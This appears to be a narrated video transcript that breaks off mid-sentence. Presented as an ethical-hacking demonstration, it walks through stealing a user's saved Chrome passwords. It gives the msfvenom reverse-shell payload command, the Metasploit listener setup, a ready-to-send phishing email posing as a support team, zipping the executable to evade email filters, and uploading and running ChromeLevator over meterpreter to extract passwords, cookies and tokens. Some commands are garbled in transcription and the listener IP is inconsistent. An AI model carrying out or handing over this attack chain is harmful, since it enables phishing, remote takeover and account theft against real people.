This is Sally. She's an artist who spends her days bringing beautiful landscapes to life on painting. But like most of us, she also lives a digital life. She checks emails, shops online, pays bills, and chats with friends, all through her trusted Windows laptop. Take today, for example. Sally wants to check her email. She opens her browser and navigates to Proton Mail, a service she chose specifically because she cares about privacy and security. She types her email, sallytrial@proton.me. Then her password, mycat2027 ! At symbol hash. A strong password, uppercase, lowercase, numbers, special characters, all the good stuff. Sally smiles, thinking, no hacker will ever find this one. She clicks sign in, and boom, she's in. But then Chrome does what Chrome always does. A little prompt appears at the top of the screen. It asks to save the password and username for this website. Sally barely glances at it. She clicks save without a second thought. This is a cool Chrome feature. The next time she wants to log in, she won't have to type the password again. Then Sally visits her favorite online store, demoblaze.com. She clicks login and enters her credentials. Her username is Sally7780, and her password is coffee@42#. She clicks login. Chrome asks again, save password for demoblaze.com. She clicks save. It's convenient, right? The browser remembers for her. No more typing that long password every time. It's secure, she thinks. But here's the uncomfortable truth that Sally, and most people, don't realize. When you click Save Password in Chrome, Edge, or Firefox, you're not storing that password in some impenetrable vault. You're storing it in a file on your computer. It's encrypted, yes, but the key to decrypt it is sitting right there on your machine, tied to your Windows login. And if an attacker gains even remote access to your machine, that file becomes a treasure chest waiting to be opened. Every password, every cookie, every saved credit card number will be exposed. And this is where Kim comes in. He is a penetration tester and ethical hacker. His role is to break into systems with permission, so he can show people like Sally where their security fails before the real criminals find it. Today, Kim isn't interested in Sally's art. He's interested in something far more valuable, her digital identity. Every password Sally has ever saved in her browser is like a key to her entire online life. Her email, her shopping accounts, maybe even her banking. And today, Kim is going to ethically steal every single one of them. Now let's dive in and see how Kim steals Sally's password saved in Chrome. First, Kim needs a way in. He's going to create what's called a reverse shell payload. This is a small program that, when run on Sally's computer, reaches back out to Kim's machine and gives him remote access. To do so, Kim opens a terminal on his Kali Linux machine and types msf venom-p Windows/x64/meterpreter/reverse TCP. This generates a 64-bit meterpreter reverse TCP payload, which can be used to establish a remote connection to a target system. Next, he needs to specify lhost. This is the IP address of a machine he controls. This is where Sally's computer will connect back to. Kim opens a new terminal and types IPA to find his IP address. He sees 192.168.122.71 and uses that as his lhost value. Then comes lport. This is the port Kim's machine will listen on for the incoming connection. He chooses 4444, a common port for this type of attack. Finally, he adds -fx to specify the output format as a Windows executable, and -o updater.x to name the file. And that's it. The full command is ready. When Kim presses enter, this will create updater.x, a file that looks innocent, but will give Kim full remote access the moment Sally runs it. Kim presses enter. And just like that, he now has his weapon. Now he just needs Sally to run it. He'll email it to her. When Sally clicks it, it will open a tunnel back to Kim. But how does Kim hear it? He needs to be listening for that connection, waiting for Sally to click. To do so, he uses the Metasploit framework console. He fires it up, and the Metasploit console loads up. Now Kim needs to configure the listener. Think of it like setting up a walkie-talkie on the right channel. He types use exploit multi-handler. This command tells Metasploit to activate a module designed to catch incoming connections. Essentially, it turns his machine into a receiver. Next, he types set payload windows x64 meterpreter reverse TCP. This tells the receiver exactly what kind of signal to expect. It has to match the payload he built into updater.x, like making sure two walkie-talkies are on the same frequency. Then he sets his IP address with set lhost 192.168.122.71. This tells the listener which network door to watch. He sets the port with set L port 4444. Think of this as the specific channel on the walkie-talkie. Finally, he types exploit. This activates the listener. The terminal responds, started reverse TCP handler on 192.168.1.105:4444. Kim sits back, waiting. The trap is set. Now he just needs Sally to take the bait. Now he can craft an email to Sally, which contains the payload. The email reads, "Dear user, we have detected that your system is out of date and requires an immediate security update. To complete this update, please download the attached file and run the update installer on your device. The update will only take a few minutes to install. This update is essential for the continued performance and security of your system. Best regards, support team." Now comes the final and most important piece. Kim needs to attach the updater.x file to the email. But there's a problem. Most email providers block .x files outright. They know executables are dangerous. So Kim will zip it before sending. Zipping does two things. It compresses the file, but more importantly, it wraps the .x inside a container that looks less suspicious to email filters. To zip the file, Kim goes back to his terminal and types zip updater.zip updater.x. This command takes his updater.x file and packages it into a new file called updater.zip. Kim presses enter. The zip file is created. His phishing email is ready to go. Now he can go back to ProtonMail and attach the zip file. He clicks the attachments icon and select the updater.zip file. And voila! The phishing mail is now complete. He clicks send. After a few seconds, the email is on its way to Sally. Now, all it takes is one click from Sally, and he's in. Meanwhile, Sally checks her email. There's a message from what looks like the Windows support team. The subject line warns of a critical update. The email says she must run the attachment immediately to protect her computer. She doesn't think twice. She downloads the file, opens it, then extracts the zip. And there it is, the updater.x Trojan Kim sent her. It disguises itself as something legitimate while hiding its true purpose. Sally double-clicks it, thinking it's a genuine security update from Microsoft. Nothing seems to happen. But in reality, something huge just happened behind the scenes. On Kim's screen, the terminal explodes with activity. Sally's computer has reached out across the internet, connecting back to Kim's machine. The tunnel is now open. Sally's computer is no longer just hers, it's theirs. Kim's screen outputs. MeterPreter session 1 opened. Boom. Kim is in. He now has a MeterPreter shell on Sally's Windows machine. This isn't just a command prompt. This is one of the most powerful post-exploitation tools in existence. Now that Kim has access, he needs to get his bearings. First, he checks what user he's running as. To do so, he types getuid. The output is server username desktop/Sally. This tells Kim he's running as Sally herself, meaning he has all the access Sally has. Next, he checks what system he's on using the sysinfo command. He can see that Sally's machine is running Windows 10 with a 64-bit architecture. Now, here's where things get interesting. Since Kim is already logged in as Sally through the MeterPreter session he established, He could manually locate the file containing Sally's encrypted Chrome passwords, find the decryption key, which, as explained earlier, is tied to her Windows user account, and write custom scripts to decrypt the passwords. But such a process is also tedious, time-consuming, and error-prone. In fact, why bother reinventing the wheel when there's a tool built specifically for this? This tool is called ChromeLevator. ChromeLevator is a modern, open-source tool designed for one purpose: extracting stored passwords from a compromised machine. It pulls passwords, cookies, credit cards, and session tokens automatically. First, Kim needs to get ChromeLevator onto Sally's machine. To do so, he first downloads it. He goes back to his browser and searches for ChromeLevator. The first result is the official GitHub page. He clicks it. A GitHub page for the ChromeLevator project opens. On that page, he looks for the Releases section and opens the release page. There, he scrolls down and finds the chrome-injector.zip file. This is the file containing the tool that will decrypt Sally's passwords. He downloads it. Then he navigates to his Downloads folder to verify the download. As you can see in his Downloads folder, there's a new file, chrome-injector.zip. He unzips it using the unzip command. And there it is. He gets two new files, ChromeLevator x64.x for 64-bit systems and ChromeLevator ARM64.x for ARM64-based devices. ChromeLevator x64.x is the one Kim needs, since he confirmed earlier with the sysinfo command that Sally's machine is running 64-bit architecture. Now that he has the file, he can upload it directly to Sally's machine through MeterPreter. To do so, he types the command upload, followed by the path to the ChromeLevator x64.x file. Then specifies the destination path on Sally's machine where he wants to upload the file, which is the temp directory, a common hiding spot that doesn't raise alarms. He hits enter. And voila, the upload is complete. Now that ChromeLevator x64.exe is on Sally's machine, Kim needs to execute it there. To do so, he needs a standard Windows command shell on Sally's computer. That's exactly what the shell command provides. He types shell and presses enter. Instantly, he's dropped into Sally's command prompt. Once in the shell, he can use standard Windows command. For example, he can use the change directory command to navigate to Sally's temp folder. Remember, this is where he uploaded the ChromeLevator.x file. Now that Kim is in Sally's temp folder, he can use the dir command to list the contents and verify that the ChromeLevator executable actually landed there. And voila, the file is there. The upload succeeded. The tool is ready. Now all Kim needs is to execute it. To execute ChromeLevator, Kim types ChromeLevator x64.x chrome-o Sally data. Let's break down what this command does. ChromeLevator x64.x is the exact name of the ChromeLevator executable Kim uploaded to Sally's machine. Chrome tells ChromeLevator to target Chrome specifically, rather than Firefox or Brave, for example. -o Sally data specifies the output directory where results will be saved. Sally data is the folder name. This is where the extracted data will land. Kim presses enter. For a few seconds, the tool does its magic, injecting into Chrome's process, bypassing encryption, and pulling out everything Sally has ever saved. Then boom. The results appear, 18 cookies and 2 passwords found. Sally's digital life, now neatly packaged and waiting for Kim to explore. Looking closer, we can see that ChromeLevator automatically saved the results in a new folder called Chrome, located inside Sally data folder. Before Kim navigates to Sally's data, he first types exit to leave the Windows shell and return to MeterPreter. This is because the Windows shell is limited. MeterPreter offers a much richer set of file commands. For example, the pwd command, which reveals the current working directory in a much cleaner and more consistent way than the Windows shell. As Kim navigates to Sally's data, he spots the Chrome folder, created by ChromeLevator. He enters it. Inside, he finds a folder named Default. This is the default Chrome profile on Sally's machine. Kim digs deeper. A quick ls command reveals what he's after: 2 files, cookies.json and passwords.json. Everything